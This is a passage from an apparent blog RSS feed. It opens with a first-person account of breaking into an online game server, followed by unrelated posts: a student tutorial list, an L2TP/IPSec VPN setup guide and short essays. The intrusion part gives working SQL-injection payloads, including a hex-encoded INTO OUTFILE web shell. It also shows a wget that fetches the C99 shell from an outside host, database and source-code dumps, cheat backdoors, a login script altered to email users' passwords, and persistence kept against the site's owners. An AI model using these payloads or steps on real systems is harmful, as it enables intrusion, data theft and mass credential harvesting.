This is the trick: it uses the UNION on the first, single-column query (remember, the second query, the programmers' duplicate, expected 3 columns and simply errors out) to make MySQL write the result of the SELECT, the string <strong>&lt;?php echo shell_exec($_REQUEST[q])</strong>, into the file /tmp/general_lang.php via INTO OUTFILE. The string is valid PHP that hands whatever arrives in the q parameter to the operating system shell (they used Ubuntu) and echoes the output. This query also produces the same error we saw on the first server, but by then the first query has already run and the file exists. Now I simply reloaded the login page and viewed its source, only to find the following:
<blockquote>
<pre id="line1">0 &amp;lt;?php echo shell_exec&amp;#40;$_REQUEST[q]&amp;#41;</pre>
</blockquote>
It turned out that CodeIgniter had another trick up its sleeve: its global XSS filter had rewritten the &lt; and the parentheses in my POSTed input into their <a href="http://en.wikipedia.org/wiki/Html_entities">HTML entities</a> before the value ever reached the query, a defence aimed at XSS and similar attacks. It actually took me a while to work out that this was the framework's doing; at first I thought I had made a mistake.
<h3 dir="ltr">Breaking the habit</h3>
The good news was that I knew a way around it. The bad news was that /tmp/general_lang.php already existed, and MySQL's <strong>into outfile</strong> refuses to overwrite an existing file. The other good news was that I still had a few more tries, since the application loads several language files, not only "general_lang.php". This time I used <a href="http://www.string-functions.com/string-hex.aspx">an online string-to-hex tool</a> to get the hex form of my PHP code "&lt;?php echo shell_exec($_REQUEST[q])", which is 3c3f706870206563686f207368656c6c5f6578656328245f524551554553545b715d29. Then I used the following query to create a new file:
<blockquote>' and 1=0 union select unhex("3c3f706870206563686f207368656c6c5f6578656328245f524551554553545b715d29") into outfile "/tmp/races_lang.php" -- </blockquote>
This time the XSS filter found nothing to rewrite in a string of hex digits, so the parameter reached MySQL intact, and MySQL's <strong>unhex()</strong> turned it back into the actual code as it wrote the file. Now I had command execution on the server, although as a restricted user, www-data. The rest of the process is a piece of cake, yet I will describe it for you.
<h3 dir="ltr">Eating the Cake</h3>
I used the following command to find a suitable spot to upload my actual shell:
<blockquote>ls -la /var/www</blockquote>
Result was:
<blockquote>
<pre>-rwxrwxr-x 18 root root 4096 Feb 4 11:10 index.php 
-rwxr-xr-x 22 root root 4096 Feb 4 12:25 repairing.php 
drwxrwxr-x 1 root root 0 Jan 2 12:31 system
drwxr-xr-x 5 root root 4096 Feb 5 15:11 <del>Removed From Text</del>
drwxr-xr-x 21 root root 4096 Oct 20 15:33 <del>Removed From Text</del>Game2--
drwxr-xr-x 3 root root 4096 Oct 12 15:38 <del>Removed From Text</del>Game2~~ 
lrwxrwxrwx 1 root root 8 Sep 4 13:15 IptV -&gt; <del>Removed From Text</del> 
drwxrwxrwx 10 sshadmin sshadmin 4096 Jan 2 12:54 azOld 
drwxrwxrwx 8 root root 4096 Feb 4 05:21 azpanel 
drwxrwxrwx 10 root root 4096 Oct 19 19:55 chat. 
drwxr-xr-x 2 root root 4096 Oct 15 14:00 email igniter 
drwxrwxrwx 7 root root 4096 Feb 4 05:16 help 
drwxrwxrwx 5 www-data www-data 4096 Oct 26 19:54 helptest 
drwxrwxrwx 4 www-data www-data 4096 Oct 19 19:28 help~ 
-rwxrwxr-x 1 root root 177 Sep 4 2010 index.html 
drwxr-xr-x 7 root root 4096 May 30 2011 register~ 
drwxr-xr-x 2 www-data www-data 4096 Feb 4 04:10 s5 
drwxrwxrwx 4 root root 4096 Feb 5 18:56 s5b 
drwxr-xr-x 4 root root 4096 Jul 6 2011 store-- 
drwxrwxrwx 3 www-data www-data 4096 Aug 2 2011 tools 
-rwxrwxr-x 1 root root 7491 Sep 9 2010 webmin.log 
drwxrwxrwx 7 root root 4096 Feb 4 12:29 wordpress</pre>
</blockquote>
Directories owned by www-data are fully usable for me, and so are those with mode rwxrwxrwx, which anyone may write to. Let's assume I used the folder "help", which is reachable at the URL <strong>help4.<del>Removed From Text</del>.ir</strong>. How did I figure that out? Simply by reading the virtual host definitions through my shell with <strong>cat /etc/apache2/sites-enabled/*</strong>. Then I used the following command to fetch C99 (a PHP web shell) onto the server:
<blockquote>wget "http://www.Sh3LL.org/c99.txt?" -O /var/www/help/shell.php</blockquote>
And simply access my beloved C99 shell at http://help4.<del>Removed From Text</del>.ir/shell.php. Now I went for what I was most enthusiastic about: the source code of the online game! I'm one of the top Iranian PHP developers, and I could develop an online MMORPG myself, but that would take a lot of time and money, so I was eager to get my hands on their code, both to see what they had done and to find their mistakes and help them fix them. I ran the following commands to compress the whole /var/www folder and make it reachable over the web, then downloaded it to my PC:
<blockquote>tar -zcvf /tmp/code.tar.gz /var/www # takes a few minutes, it's 500 MB

ln -s /tmp/code.tar.gz /var/www/help/code.tar.gz</blockquote>
Then I removed the archive (or maybe I forgot to?). Next I wanted the whole database, to be able to run the game on another server, presumably my own system, but I needed the MySQL root password for that. Don't panic; the <del>Removed From Text</del> team made it easy: they had to put the database username and password in /var/www/<del>Removed From Text</del>/application/config/database.php, and they had chosen to use root for their game, so I took the password from the file and ran:
<blockquote>mysqldump -u root -pROOTPASS --all-databases | gzip &gt; /tmp/mysql.tar.gz

ln -s /tmp/mysql.tar.gz /var/www/help/mysql.tar.gz</blockquote>
And so I downloaded the whole MySQL data to my system as well (570 MB). The next step was to change many parts of the source code to let me cheat. For example, I added backdoors to finish my buildings in less than a second, to fill my pool of resources, to add money to my account, and so on. The final step was to obtain the list of user passwords. Since there were 17000 users in the database and their passwords were salted and SHA hashed, I did not dare pay for a supercomputer to break them all; instead I changed the login script of <del>Removed From Text</del> to email me a copy of the username and password whenever a user logs in, and I have obtained 5000 username/password pairs since then.
<h3 dir="ltr">Epilogue</h3>
The walkthrough in this post was actually performed by me. Some of the steps required a lot of thought and caution, both to avoid being tracked and to avoid ruining my chances (as nearly happened with the language files). I have to disappoint you right here and now by telling you that I contacted the <del>Removed From Text</del> team and patched their software, so that it is no longer insecure (after all, I'm a <a href="http://en.wikipedia.org/wiki/Whitehat">white-hat</a>). I also spread my access across many parts of the server, notably SSH and SVN credentials and other critical information, so that under no circumstances could any security expert other than me lock me out. Have fun learning information security!

</div>
</div>]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/asmandez-codeigniter-hacked/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Internet Engineering Tutorial Documents</title>
		<link>http://abiusx.com/%d8%b3%d9%86%d8%af%d9%87%d8%a7%db%8c-%d8%a2%d9%85%d9%88%d8%b2%d8%b4%db%8c-%d9%85%d9%87%d9%86%d8%af%d8%b3%db%8c-%d8%a7%db%8c%d9%86%d8%aa%d8%b1%d9%86%d8%aa/</link>
		<comments>http://abiusx.com/%d8%b3%d9%86%d8%af%d9%87%d8%a7%db%8c-%d8%a2%d9%85%d9%88%d8%b2%d8%b4%db%8c-%d9%85%d9%87%d9%86%d8%af%d8%b3%db%8c-%d8%a7%db%8c%d9%86%d8%aa%d8%b1%d9%86%d8%aa/#comments</comments>
		<pubDate>Fri, 03 Feb 2012 17:47:26 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Computer]]></category>
		<category><![CDATA[Ajax]]></category>
		<category><![CDATA[Internet tutorial]]></category>
		<category><![CDATA[Web tutorial]]></category>
		<category><![CDATA[Ajax]]></category>
		<category><![CDATA[Database]]></category>
		<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[CSS]]></category>
		<category><![CDATA[Application layer]]></category>
		<category><![CDATA[Internet Engineering]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Web server]]></category>
		<category><![CDATA[Web 2.0]]></category>
		<category><![CDATA[Scripting]]></category>
		<category><![CDATA[Protocol]]></category>
		<category><![CDATA[PHP]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=692</guid>
		<description><![CDATA[Last semester, when I was the teaching assistant for Internet Engineering, a set of tutorial documents was prepared by the students who had chosen the research project. After several months I finally picked the best ones and uploaded them; they are all at the address below. The list of the selected articles follows: http://abiusx.com/ta/sbuie89b/project/research [...]]]></description>
				<content:encoded><![CDATA[Last semester, when I was the teaching assistant for Internet Engineering, a set of tutorial documents was prepared by the students who had chosen the research project. After several months I finally picked the best ones and uploaded them; they are all at the address below. I am also putting the list of the selected articles in the rest of this post:
<p style="text-align: center;" dir="ltr"><a title="Selected Internet Engineering articles" href="http://abiusx.com/ta/sbuie89b/project/research">http://abiusx.com/ta/sbuie89b/project/research</a></p>
<p style="text-align: center;" dir="ltr"><span id="more-692"></span></p>
<a href="/file/ta/sbuie89b/research/samples/internet_usual_protocols_farsi_2011_belghadr_firoozabadi.pdf">
A survey of some common Internet protocols</a>
<span>Armin Belghadr, Masoud Firoozabadi</span>
<a href="/file/ta/sbuie89b/research/samples/internet_usual_protocols_farsi_2011_arezoomand.pdf">
Common Internet protocols
and the application layer</a>
<span>Fatemeh Arezoomand</span>

<a href="/file/ta/sbuie89b/research/samples/internet_usual_protocols_farsi_2011_amirabadi_farahani.pdf">
The Internet and its common protocols
</a><span>Reyhaneh Amirabadi Farahani
</span>

<a href="/file/ta/sbuie89b/research/samples/web_protocols_part1_farsi_2011_belghadr_firoozabadi.pdf">
Protocols and technologies used on the Web (part one)
</a><span>Armin Belghadr, Masoud Firoozabadi
</span>

<a href="/file/ta/sbuie89b/research/samples/internet_usual_protocols_farsi_2011_elmira_nezamfar.pdf">
Common Internet protocols (and application-layer protocols)
</a><span>Elmira Nezamfar
</span>

<a href="/file/ta/sbuie89b/research/samples/web2_overview_farsi_2011_fatemeh_elyasi.pdf">
Web 2.0: reasons for its emergence, characteristics and outlook
</a><span>Fatemeh Elyasi
</span>

<a href="/file/ta/sbuie89b/research/samples/web2_overview_farsi_2011_zahra_vahidi.pdf">
Web 2.0
</a><span>Zahra Vahidi Ferdowsi
</span>

<a href="/file/ta/sbuie89b/research/samples/Ajax-ArminBelghadr,MasoudFiroozabadi.pdf">
Ajax
</a><span>Armin Belghadr, Masoud Firoozabadi
</span>

<a href="/file/ta/sbuie89b/research/samples/Ajax-ZahraHosseini,ElaheJalambadani.pdf">
Ajax tutorial
</a><span>Zahra Hosseini, Elaheh Jalambadani
</span>

<a href="/file/ta/sbuie89b/research/samples/CSS-FarhangHoseini,MahdiJazayeri.pdf">
CSS tutorial
</a><span>Farhang Hosseini, Mahdi Jazayeri
</span>

<a href="/file/ta/sbuie89b/research/samples/CSS-ZahraHoseini,ElaheJalambadani.pdf">
CSS tutorial
</a><span>Zahra Hosseini, Elaheh Jalambadani
</span>

<a href="/file/ta/sbuie89b/research/samples/HTML,CSS,Javascript,WebServer-ElmiraNezamfar.pdf">
Protocols and technologies used on the Web
</a><span>Elmira Nezamfar
</span>

<a href="/file/ta/sbuie89b/research/samples/HTML,CSS,Javascript,WebServer-FatemeArezoomand.pdf">
Protocols and technologies used on the Web
</a><span>Fatemeh Arezoomand
</span>

<a href="/file/ta/sbuie89b/research/samples/HTML,CSS,Javascript,WebServer-FatemeDashti.pdf">
Protocols and technologies used on the Web
</a><span>Fatemeh Dashti
</span>

<a href="/file/ta/sbuie89b/research/samples/HTML,CSS,Javascript,WebServer-MehranGoli.pdf">
Protocols and technologies used on the Web
</a><span>Mehran Goli
</span>

<a href="/file/ta/sbuie89b/research/samples/InternetProtocols-MarzieKarimi.pdf">
Internet protocols
</a><span>Marzieh Karimi Nouri
</span>

<a href="/file/ta/sbuie89b/research/samples/InternetProtocols-ReyhaneAmirabadiFarahani.pdf">
Web 2.0
</a><span>Reyhaneh Amirabadi Farahani
</span>

<a href="/file/ta/sbuie89b/research/samples/InternetProtocols-RositaRahimi.pdf">
Internet protocols
</a><span>Rosita Rahimi
</span>

<a href="/file/ta/sbuie89b/research/samples/Javascript-ZahraHoseini,ElaheJalambadani.pdf">
JavaScript tutorial
</a><span>Zahra Hosseini, Elaheh Jalambadani
</span>

<a href="/file/ta/sbuie89b/research/samples/PHP-ZahraHoseini,ElaheJalambadani.pdf">
PHP tutorial
</a><span>Zahra Hosseini, Elaheh Jalambadani
</span>

<a href="/file/ta/sbuie89b/research/samples/ServerSideScripts-ArminBelghadr,SinaFiroozabadi.pdf">
Server-side scripting languages
</a><span>Armin Belghadr, Masoud Firoozabadi
</span>

<a href="/file/ta/sbuie89b/research/samples/Web2-ArminBelghadr,SinaFiroozabadi.pdf">
An introduction to Web 2.0 and its approaches
</a><span>Armin Belghadr, Masoud Firoozabadi
</span>

<a href="/file/ta/sbuie89b/research/samples/WebDatabase-ArminBelghadr,MasoudFiroozabadi.pdf">
Server databases
</a><span>Armin Belghadr, Masoud Firoozabadi
</span>

<a href="/file/ta/sbuie89b/research/samples/WebServer-ZeynabAbbasimazar.pdf">
Web servers
</a><span>Zeynab Abbasimazar
</span>]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/%d8%b3%d9%86%d8%af%d9%87%d8%a7%db%8c-%d8%a2%d9%85%d9%88%d8%b2%d8%b4%db%8c-%d9%85%d9%87%d9%86%d8%af%d8%b3%db%8c-%d8%a7%db%8c%d9%86%d8%aa%d8%b1%d9%86%d8%aa/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>L2TP on Ubuntu 10.04 LTS</title>
		<link>http://abiusx.com/l2tp-on-ubuntu-10-04-lts/</link>
		<comments>http://abiusx.com/l2tp-on-ubuntu-10-04-lts/#comments</comments>
		<pubDate>Tue, 10 Jan 2012 21:59:29 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Computer]]></category>
		<category><![CDATA[English]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Encryption]]></category>
		<category><![CDATA[IPSec]]></category>
		<category><![CDATA[L2TP]]></category>
		<category><![CDATA[L2TP over IPSec]]></category>
		<category><![CDATA[openswan]]></category>
		<category><![CDATA[OpenVPN]]></category>
		<category><![CDATA[PKI]]></category>
		<category><![CDATA[ppp]]></category>
		<category><![CDATA[PPTP]]></category>
		<category><![CDATA[Proxy]]></category>
		<category><![CDATA[PSK]]></category>
		<category><![CDATA[SSTP]]></category>
		<category><![CDATA[Virtual Private Network]]></category>
		<category><![CDATA[xl2tpd]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=686</guid>
		<description><![CDATA[This post is a tutorial on how to run a L2TP over IPSec VPN Server for proxy purposes on a Ubuntu 10.04 LTS Server machine. Before we start the practice, let us review some theories: What is VPN? Virtual Private Network, is a technology, mainly developed to provide creation of virtual local networks with a [...]]]></description>
				<content:encoded><![CDATA[<p dir="ltr">This post is a tutorial on how to run an L2TP over IPSec VPN server for proxy purposes on an Ubuntu 10.04 LTS server. Before we get practical, let us review some theory:</p>
<p dir="ltr"><strong>What is VPN?</strong></p>
<p dir="ltr">A Virtual Private Network is a technology developed mainly to create virtual local networks spanning a wide geographic area. For example, we have a data centre and a sizeable network in <a title="Bandar Abbas" href="http://en.wikipedia.org/wiki/Bandar_Abbas">Bandar Abbas</a> that needs constant maintenance and connectivity to our main servers and offices back in Tehran. We need one local network consisting of our office networks and the Bandar Abbas network, but since they are geographically distributed we cannot make them local, so we cheat and virtually create a private (local) network, hence VPN.</p>
<p dir="ltr">Specifically speaking, we start a VPN server on our Bandar Abbas hub server (main.rajaei.abx.ir), then create a VPN connection from our computer (or router) and connect to it, and it would be like we have just plugged an Ethernet cable into our system, directly connected to whole Bandar Abbas network. After that we could simply connect to our surveillance server at 192.168.0.220 (which is a Bandar Abbas network IP, not ours) via any application.</p>
<p dir="ltr">As you might&#8217;ve already guessed, since VPN is usually established over the Internet, the most important thing to expect is data transmission security. No third party on the route should be able to sniff on our corporates data, right? VPN security is almost the main issue.</p>
<p dir="ltr"><strong>Then what is PPTP, L2TP, IPSec, SSTP, etc. ?</strong></p>
<p dir="ltr">VPN is a concept. It is also a technology, but many protocols and combinations of technologies provide it. The simplest form is <a href="http://en.wikipedia.org/wiki/Pptp">PPTP</a>, the Point-to-Point Tunneling Protocol. It is easily set up, easily connected and fast; a PPTP server on Ubuntu takes under five minutes. The problem with PPTP is its encryption: the MPPE session keys are derived from the MS-CHAPv2 authentication exchange, and an attacker who records that exchange can recover the password hash offline (MS-CHAPv2 reduces to a brute-forceable DES problem) and with it the keys, so anything sent over PPTP should be regarded as readable by an eavesdropper.</p>
<p dir="ltr">Then there is OpenVPN, which is fully open source and good, but since Windows has no native client for it, it sees far less use. <a href="http://en.wikipedia.org/wiki/Secure_Socket_Tunneling_Protocol">SSTP</a> is Microsoft's and Windows-only; it carries the tunnel inside an <a href="http://en.wikipedia.org/wiki/Secure_Sockets_Layer">SSL</a> connection, much as IPSec underlies L2TP.</p>
<p dir="ltr">The other widely used VPN technology is <a href="http://en.wikipedia.org/wiki/L2TP">L2TP</a>, which relies on <a href="http://en.wikipedia.org/wiki/Ipsec">IPSec</a> (a lower, network-layer protocol suite) for its security. IPSec authenticates the two peers with either <a href="http://en.wikipedia.org/wiki/Public_key_infrastructure">PKI</a> (certificates) or a <a href="http://en.wikipedia.org/wiki/Pre-shared_key">PSK</a> (pre-shared key) and negotiates the session keys with a Diffie-Hellman exchange (IKE), so a third party listening on the path cannot recover the keys or the secret. That holds as long as the PSK is long and random: with IKEv1 aggressive mode a weak PSK can be cracked offline from a captured exchange (the configuration below does not enable aggressive mode).</p>
<p dir="ltr">L2TP is technically called L2TP over IPSec, which is because first IPSec establishes a secure connection between two systems, then layer 2 tunneling protocol takes over for the networking and VPN functionality.</p>
<p dir="ltr"><strong>VPN as a means of proxy</strong></p>
<p dir="ltr">In many cases a VPN is used the way a proxy server is used: to bypass certain restrictions or for privacy. Since a VPN operates at the network layer, a VPN-based proxy carries all kinds of traffic, not just web pages or video. Everything from peer-to-peer connections to DNS lookups goes over the VPN.</p>
<p dir="ltr">To use a VPN as a proxy, we simply connect to a VPN far away (usually outside the filtering region, if we are trying to bypass regional filtering) and use its Internet connection. It is as if our Internet gateway were not our own modem but the computer at the VPN end.</p>
<p dir="ltr">VPN technologies (PPTP, L2TP, SSTP, OpenVPN and the rest) all use particular ports and have recognisable traffic patterns, so blocking VPN usage is fairly simple; PPTP, for instance, no longer stays up for more than a few seconds in Iran.</p>
<p dir="ltr">But with SSTP and L2TP, since both use a lower level encryption methodology (IPSec for L2TP), they can not be easily blocked. You might think that it would be pretty easy to prevent all IPSec connections and thus stop L2TP, as well as SSL for SSTP, but the case is, IPSec and SSL are used for all forms of encryption. When you use a banking service on the Internet, you employ SSL. When you transfer a file securely over the network, you employ IPSec. Blocking them would stop half of the Internet functionality.</p>
<p dir="ltr">There&#8217;s also no way of peeking into IPSec or SSL encrypted data (which contain the actual VPN packets), hence L2TP and SSTP services could not be stopped that easily.</p>
<p dir="ltr"><strong>Lets get dirty</strong></p>
<p dir="ltr"><span id="more-686"></span></p>
<p dir="ltr"><strong></strong>Now I&#8217;m going to provide you with instructions on how to setup and use a L2TP VPN on your Ubuntu server for proxy purpose.</p>
<p dir="ltr">First of all, install a few packages:</p>

<blockquote>
<p dir="ltr">sudo apt-get install ppp xl2tpd openswan</p>
</blockquote>
<p dir="ltr">After having all the necessary daemons, assuming your server&#8217;s IP address is 178.162.154.252 (which is actually abiusx.com&#8217;s), put the following in <em>/etc/ipsec.conf file</em></p>

<blockquote dir="ltr">
<p dir="ltr">version 2.0</p>
config setup
nat_traversal=yes
virtual_private=%v4:10.0.0.0/8,%v4:192.168.0.0/16,%v4:172.16.0.0/12
oe=off
protostack=netkey

include /etc/ipsec.d/l2tp-psk.conf</blockquote>
<p dir="ltr">Then open up <em>/etc/ipsec.d/l2tp-psk.conf</em> and put the following in it, don&#8217;t forget to replace my IP with yours:</p>

<blockquote>
<p dir="ltr">conn L2TP-PSK-NAT
rightsubnet=vhost:%priv
also=L2TP-PSK-noNAT</p>
<p dir="ltr">conn L2TP-PSK-noNAT
authby=secret
pfs=no
auto=add
keyingtries=3
rekey=no
type=transport
left=<del>178.162.154.252</del>
leftnexthop=<del>178.162.154.1</del>
leftprotoport=17/1701
right=%any
rightprotoport=17/%any
dpddelay=15
dpdtimeout=30
dpdaction=clear</p>
</blockquote>
<p dir="ltr">You also need to open <em>/etc/ipsec.secrets</em> and put your pre-shared secret in it. 123456789 below is only a placeholder: use a long random string, since a guessable PSK is the one thing that lets an eavesdropper into an IPSec session.</p>

<blockquote>
<p dir="ltr"><del>178.162.154.252</del>   %any:  PSK &#8220;123456789&#8243;</p>
</blockquote>
<p dir="ltr">Now restart IPSec, and watch your /var/log/auth.log and you&#8217;re done for IPSec on the server. On the client (preferably a Windows machine), create a VPN connection, on its properties dialog, in security tab, there&#8217;s &#8220;IPSec Settings&#8221; which asks you for the pre-shared secret. Provide 123456789. On the networking tab, from Type of VPN, select L2TP IPSec VPN. Now connect and inspect your server:</p>

<blockquote>
<p dir="ltr">sudo service ipsec restart
sudo tail -f /var/log/auth.log</p>
</blockquote>
<p dir="ltr">You should see something like &#8220;<em>IPsec SA established</em>&#8221; in middle of some logs, that means IPSec was successfully established. Of course the VPN connection will fail since we haven&#8217;t setup L2TP part yet.</p>
<p dir="ltr"><strong>L2TP Setup</strong></p>
<p dir="ltr">Now we need to configure xl2tpd. There are three files to change: the xl2tpd configuration, the PPP options file it points to, and the username/password file. Let's start with <em>/etc/xl2tpd/xl2tpd.conf</em>, which should contain the following:</p>

<blockquote>
<p dir="ltr">[global]
ipsec saref = yes
[lns default]
ip range = 192.168.1.231-192.168.1.239
local ip = 192.168.1.230
refuse chap = yes
refuse pap = yes
require authentication = yes
ppp debug = yes
pppoptfile = /etc/ppp/options.xl2tpd
length bit = yes</p>
</blockquote>
<p dir="ltr">Then off to<em>  /etc/ppp/options.xl2tpd </em>which would have:</p>

<blockquote>
<p dir="ltr">require-mschap-v2
ms-dns 192.168.1.1
asyncmap 0
auth
crtscts
lock
hide-password
modem
debug
name l2tpd
proxyarp
lcp-echo-interval 30
lcp-echo-failure 4</p>
</blockquote>
<p dir="ltr">And finally <em>/etc/ppp/chap-secrets</em> which contains username/password pairs:</p>

<blockquote>
<p dir="ltr">username l2tpd 1234 192.168.1.231
l2tpd username 1234 192.168.1.231
user2 l2tpd 123 *</p>
</blockquote>
<p dir="ltr">Since the * form crashes on some versions of xl2tpd, prefer the static user/IP method. To wrap things up, <em>/etc/sysctl.conf</em> should contain "net.ipv4.ip_forward = 1", which enables IP forwarding. If you have just added it, apply it with <em>sudo sysctl -p</em> (or reboot).</p>
<p dir="ltr">For proxy use you also need NAT: masquerade traffic from the VPN address pool out of the server's public interface, otherwise clients connect but cannot reach anything beyond the server itself.</p>
<p dir="ltr">Have fun using L2TP over IPSec.</p>]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/l2tp-on-ubuntu-10-04-lts/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>The Cynic and the Condemned</title>
		<link>http://abiusx.com/the-cynic-and-the-condemned/</link>
		<comments>http://abiusx.com/the-cynic-and-the-condemned/#comments</comments>
		<pubDate>Sun, 01 Jan 2012 18:51:59 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Cynic]]></category>
		<category><![CDATA[English]]></category>
		<category><![CDATA[Areté]]></category>
		<category><![CDATA[Depression]]></category>
		<category><![CDATA[Greek]]></category>
		<category><![CDATA[Greek Philosophy]]></category>
		<category><![CDATA[Idealist]]></category>
		<category><![CDATA[Philosophy]]></category>
		<category><![CDATA[Quote]]></category>
		<category><![CDATA[wiki]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=681</guid>
		<description><![CDATA[Well, I know for a fact that I&#8217;m a cynic. But I wanted to have a definition for it, so I took a peek at the Internet. The sweet Wikipedia had some definition, totally irrelevant of the popular culture, based on some old Greek Philosophy practicing Areté. Finally I found some interesting matching definitions on [...]]]></description>
<content:encoded><![CDATA[<p dir="ltr">Well, I know for a fact that I&#8217;m a cynic. But I wanted a definition for it, so I took a peek at the Internet. Wikipedia had a definition, totally unrelated to popular culture, based on an old Greek philosophy practicing Areté.</p>
<p dir="ltr">Finally I found some interesting matching definitions on wiki.answers.com:</p>
<p dir="ltr"><em><strong>What is the difference between a cynic and an idealist?</strong></em></p>

<blockquote>
<p dir="ltr">A cynic is someone who fails to thrive, who picks apart good ideas and has a tendency to make life boring and miserable for himself and others. They do not see the purpose of success. They do not get excited. They do not understand where the passion of others comes from. Idealists are dreamers of success and have a potential to succeed. They have grand dreams of things they are interested in and work hard to see them come to light. If they fail, they can quite easily become cynics themselves. Many might argue that a cynic is simply an idealist who has experienced failure. In other words, you must first be an idealist before you have the capacity to be cynical.</p>
</blockquote>
<p dir="ltr">And also a few interesting quotes on the subject, which I really enjoyed:</p>

<blockquote>
<p dir="ltr">“The cynic is one who never sees a good quality in a man, and never fails to see a bad one. He is the human owl, vigilant in darkness and blind to light, mousing for vermin, and never seeing noble game. The cynic puts all human actions into two classes &#8211; openly bad and secretly bad.” Henry Ward Beecher</p>
<p dir="ltr">“A cynic is a man who, when he smells flowers, looks around for a coffin.”
H. L. Mencken</p>
<p dir="ltr">“A cynic is not merely one who reads bitter lessons from the past, he is one who is prematurely disappointed in the future.” Sidney J. Harris</p>
</blockquote>
<p dir="ltr">And finally, an example of a cynical statement:</p>

<blockquote>
<p dir="ltr">&#8220;In the depths of my heart I can’t help being convinced that my dear fellow-men, with a few exceptions, are worthless.&#8221; Sigmund Freud</p>
</blockquote>]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/the-cynic-and-the-condemned/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>Why liberalism only suits US</title>
		<link>http://abiusx.com/why-liberalism-only-suits-us/</link>
		<comments>http://abiusx.com/why-liberalism-only-suits-us/#comments</comments>
		<pubDate>Wed, 28 Dec 2011 00:55:53 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[English]]></category>
		<category><![CDATA[Politics]]></category>
		<category><![CDATA[Story]]></category>
		<category><![CDATA[china]]></category>
		<category><![CDATA[freedom]]></category>
		<category><![CDATA[justice]]></category>
		<category><![CDATA[liberalism]]></category>
		<category><![CDATA[peace]]></category>
		<category><![CDATA[united states]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=641</guid>
		<description><![CDATA[This is People&#8217;s Republic of China, an old man is headed into a banking establishment to do some everyday bank tasks. The bank is quite crowded, but after a few minutes it&#8217;s finally his turn to take up the booth. He  seems pretty slow with papers and also isn&#8217;t the sharpest when answering the bank [...]]]></description>
<content:encoded><![CDATA[<p dir="ltr">This is the People&#8217;s Republic of China: an old man is headed into a bank to do some everyday bank tasks. The bank is quite crowded, but after a few minutes it&#8217;s finally his turn at the booth. He seems pretty slow with the papers and isn&#8217;t the sharpest when answering the bank employee&#8217;s questions, and this has been going on for a while.</p>
<p dir="ltr">The young lady who entered the bank a few seconds after the old man is growing impatient with his progress. She&#8217;s next, but it doesn&#8217;t look like her turn will come up soon. Also, there aren&#8217;t any empty booths, since few functional booths are available in the bank, and even if there were, they might have been occupied as well.</p>
<p dir="ltr">She can&#8217;t switch banks, since the other banks are just as crowded and the switching process would probably consume more time than she&#8217;ll end up waiting for her turn over a lifetime of bank chores. After all, there are rarely enough banks for everyone in China, as in almost any other country.</p>
<p dir="ltr">While waiting, the bright woman is fantasizing about something in her head:</p>

<blockquote>
<p dir="ltr">This is the United States: an old man goes into a bank to pay some bills. Since the bank is almost empty, a booth takes him as soon as he enters. The man has around 30 bills and is quite slow with paperwork, so he&#8217;s going to take at least 45 minutes.</p>
<p dir="ltr">Another customer, a young woman, also enters the bank. She seems impatient, and watching the old man take his time is boring her. Fortunately, there are plenty of other empty booths waiting for customers, and even if there weren&#8217;t, she could easily switch banks and pick another eager one with plenty of room for new customers. After all, there are many more banks than people actually need in the US.</p>
<p dir="ltr"><em>Liberalism is pretty delicious, ain&#8217;t it?</em></p>
</blockquote>
<p dir="ltr">Thinking of all that, our lady realizes the old man has made only a little progress. She wonders what the right thing to do is in a situation like this: put the old man at the back of the waiting line, since his task requires considerable time, or let him do whatever he needs in his own turn.</p>
<p dir="ltr">The second option, however liberal it might sound, is starting to seem dull and inefficient to the lady, and, surprisingly, the first one is the course of action she settles on as the best fit.</p>
<p dir="ltr"><em>After all, Liberalism ain&#8217;t that suiting for everybody, is it?</em></p>]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/why-liberalism-only-suits-us/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>How Filtering Works in Iran and Its Weak Points</title>
		<link>http://abiusx.com/%d9%86%d8%ad%d9%88%d9%87-%d9%81%db%8c%d9%84%d8%aa%d8%b1%db%8c%d9%86%da%af-%d8%af%d8%b1-%d8%a7%db%8c%d8%b1%d8%a7%d9%86-%d9%88-%d9%86%d9%82%d8%a7%d8%b7-%d8%b6%d8%b9%d9%81-%d8%a2%d9%86/</link>
		<comments>http://abiusx.com/%d9%86%d8%ad%d9%88%d9%87-%d9%81%db%8c%d9%84%d8%aa%d8%b1%db%8c%d9%86%da%af-%d8%af%d8%b1-%d8%a7%db%8c%d8%b1%d8%a7%d9%86-%d9%88-%d9%86%d9%82%d8%a7%d8%b7-%d8%b6%d8%b9%d9%81-%d8%a2%d9%86/#comments</comments>
		<pubDate>Sun, 31 Jul 2011 02:22:58 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Science]]></category>
		<category><![CDATA[Computer]]></category>
		<category><![CDATA[HTML]]></category>
		<category><![CDATA[nslookup]]></category>
		<category><![CDATA[address to IP]]></category>
		<category><![CDATA[filtering address]]></category>
		<category><![CDATA[terminal]]></category>
		<category><![CDATA[removing filtering]]></category>
		<category><![CDATA[HTTP request]]></category>
		<category><![CDATA[unfiltering]]></category>
		<category><![CDATA[bypassing filtering]]></category>
		<category><![CDATA[high-traffic site]]></category>
		<category><![CDATA[multi-server site]]></category>
